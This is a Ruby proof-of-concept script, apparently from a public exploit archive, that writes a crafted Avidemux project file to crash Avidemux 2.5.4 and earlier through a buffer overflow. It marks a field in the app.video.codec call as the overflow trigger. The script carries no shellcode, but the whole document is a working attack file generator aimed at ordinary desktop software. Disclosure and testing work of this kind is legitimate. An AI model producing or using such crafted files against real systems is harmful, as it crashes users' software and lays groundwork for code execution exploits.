#!/usr/bin/env ruby
# avidemux_crash.rb
#
# Title : Avidemux <= 2.5.4 Buffer Overflow PoC
# Date : 31.10.2010
# Version : <= 2.5.4
# Software Link : http://avidemux.sourceforge.net/download.html / http://avidemux.razorbyte.com.au/
# Author : The_UnKn@wn
# Email : the_unknown [at] group51 [dot] org
# Homepage : http://group51.org
# Tested on : openSUSE 11.3 and Windows XP SP3 English
#
# Usage:
# ruby avidemux_crash.rb <a *.mpg file>
# Start Avidemux --> Load/Run Project --> crash!!
#
# Note:
# You can also use another video file format; you would have to change the format in line #54 and maybe some other stuff too.
#
# Generates an Avidemux project file (avidemux.prj) in the current directory,
# referencing the video file given on the command line. The project script is
# written verbatim; the only interpolated value is the input path.
file = ARGV.first

unless file
  puts "Usage: ruby #{__FILE__} <path to sample video .mpg file>"
  exit
end

name = "avidemux.prj"

# Project script body. The original author marks the third argument of the
# app.video.codec(...) call ("200 ") as the field that triggers the crash.
# NOTE: the input path is interpolated unescaped into a JS string literal, so a
# path containing a double quote produces a malformed project file (same as the
# original script).
text = <<~PRJ
  //AD<- Needed to identify//
  //--automatically built--
  var app = new Avidemux();
  //** Video **
  // 01 videos source 
  app.load("#{file}");
  //01 segments:
  app.clearSegments();
  app.addSegment(0,0,157699);
  app.markerA=0;
  app.markerB=77543;
  app.rebuildIndex();
  //** Postproc **
  app.video.setPostProc(3,3,0);
  app.video.fps1000 = 25000;
  //** Filters **
  //** Video Codec conf **
  app.video.codec("Copy", "CQ=4", "200 "); 
  //** Audio **
  app.audio.reset();
  app.audio.codec("copy",-1078515528,0,"");
  app.audio.normalizeMode=0;
  app.audio.normalizeValue=0;
  app.audio.delay=0;
  app.audio.mixer="NONE";
  app.setContainer("AVI");
  setSuccess(1);
  //app.Exit();
  //End of script
PRJ

# The heredoc already ends with a newline, so a plain write yields the same
# file contents the original `puts` produced.
File.write(name, text)

puts "File #{name} has been created successfully"